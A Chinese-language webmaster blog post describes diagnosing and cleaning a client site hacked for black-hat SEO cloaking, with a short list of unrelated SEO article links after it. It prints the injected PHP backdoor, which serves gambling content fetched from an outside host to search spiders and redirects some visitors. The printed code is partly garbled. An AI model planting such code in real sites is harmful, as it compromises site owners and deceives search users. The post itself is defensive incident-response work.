前天 qq上收到一個朋友發來的消息，問我在嗎，我一看是創業園時候的朋友，就聊了起來，他所在的公司的客戶的網站被入侵了
但是他和我說 他的那個客戶的網站不是這類的，和這個一點關系都沒有，我打開了域名看到的實際內容是
是一個商業網站，這時候我的思路很清晰了，首先可以確定的是人和蜘蛛看到的內容不一樣，這也是常用黑帽手法，這樣可以獲取大量的外鏈，為了進一步確認的我思路，我決定用蜘蛛模擬器試試結果如下圖：
果然和我想的是一樣的，這就證明了我的猜想，這種一般就是在網站根目錄添加一個畸形文件，讓這個畸形文件無法刪除
并且優先級要高于網站本身的權限，或者是在網站的默認文件檔里面加上一段代碼，來調用他的文件，來判斷來的人還是蜘蛛
如果是蜘蛛就給它顯示博采的內容，如果是人就顯示正常的頁面，在了ftp帳號密碼 進行一步檢查，
發現用的是我的第二種手法， 在文件內加入了以下php代碼
$file=http://www.aoxsys.net/seo/3.html;
$referer=$_server[http_referer];
$agent= strtolower($_server[http_user_agent]);
if(strstr($referer,baidu)&&strstr($referer,456))
{
header(location: $url);
}
if ( ereg( http://www.aoxsys.net/search/spider.htm,$agent ))
{
$content=file_get_contents($file);
echo $content;
exit;
}
>
< php
這個代碼明白的一看就知道了吧，我就不解釋了，在根目錄還發現一個加密的文件，那個文件貌似是博采的網頁內容，命名為index.asp.asp 接下來就是替換index.php文件 然后刪除相關后門，打上補丁，
但是當我拿到網站后臺的帳號密碼的時候我崩潰了，密碼竟然 是默認的，帳號也是默認的，程序是dede 存在安全漏洞
修補漏洞 用dede的安全檢測工具稍微檢查了一下木馬和webshell 沒有多余發現，打上補丁收工，再用蜘蛛模擬器查看
網站內容和蜘蛛的爬行內容一致了 接下來就是@蜘蛛了 讓蜘蛛過來爬 收錄并更新快照 什么怎么@蜘蛛嗎 這你都不會嗎
那我也不會 嘿嘿!
注：更多請關注建站教程欄目


企業品牌網站建設依舊是圍繞用戶需求來提升公司形象
什么是面包屑，面包屑導航對seo有哪些作用
網絡適配器是什么（有什么作用）
新品寶貝沒流量，怎么刷？
煙臺seo教你如何做網站推廣！
網站域名和空間要如何選擇?
公司企業百度負面信息處理思路與方法維護企業好形象
企業如何提升網站體驗促進關鍵詞優化?